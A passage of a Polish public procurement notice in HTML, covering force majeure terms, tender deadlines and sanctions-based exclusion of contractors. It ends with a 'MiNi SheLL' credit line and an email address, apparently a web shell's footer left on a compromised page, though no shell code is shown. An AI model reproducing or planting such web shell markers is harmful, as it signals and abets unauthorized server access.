którego Strony nie mogły przewidzieć przed zawarciem umowy, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności); za siłę wyższą, warunkująca zmianę niniejszej Umowy należy uznać w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, stan epidemii;<br/>.....cd. w § 17 projektowanych postanowieniach umowy stanowiących załącznik nr 4.1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy https://platformazakupowa.pl/pn/zgl_mikolow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-29 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Termin realizacji zamówienia wynosi: do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego (termin wykonania przedmiotu umowy jest kryterium oceny ofert)- DOTYCZY KAŻDEJ CZĘŚCI.<br/>2.	Zamawiający przewiduje wykluczenie Wykonawcy na podstawie art. 7 ust. 1 ustawy z 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego zwana dalej „UOBN”<br/>2.1.Zgodnie z art. art. 7 ust. 1 UOBN z postępowania o udzielenie zamówienia zamawiający wyklucza Wykonawcę: <br/>1)	wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN; <br/>2)	którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t.j. Dz.U. z 2023 r. poz 1124 z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN; <br/>3)	którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (t.j. Dz. U. 2023 r. poz. 120 z późn. zm), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN. <br/>2.2. Wykluczenie, o którym mowa w ust. 2 następować będzie na okres trwania ww. okoliczności. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie art. 7 ust. 1 UOBN, Zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/> 2.3. Zamawiający będzie weryfikował przesłankę wykluczenia na podstawie: <br/>1)	Wykazów określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014, <br/>2)	Listy Ministra właściwego do spraw wewnętrznych obejmującej osoby i podmioty, wobec których są stosowane środki, o których mowa w art. 1 UOBN

Creat By MiNi SheLL
Email: jattceo@gmail.com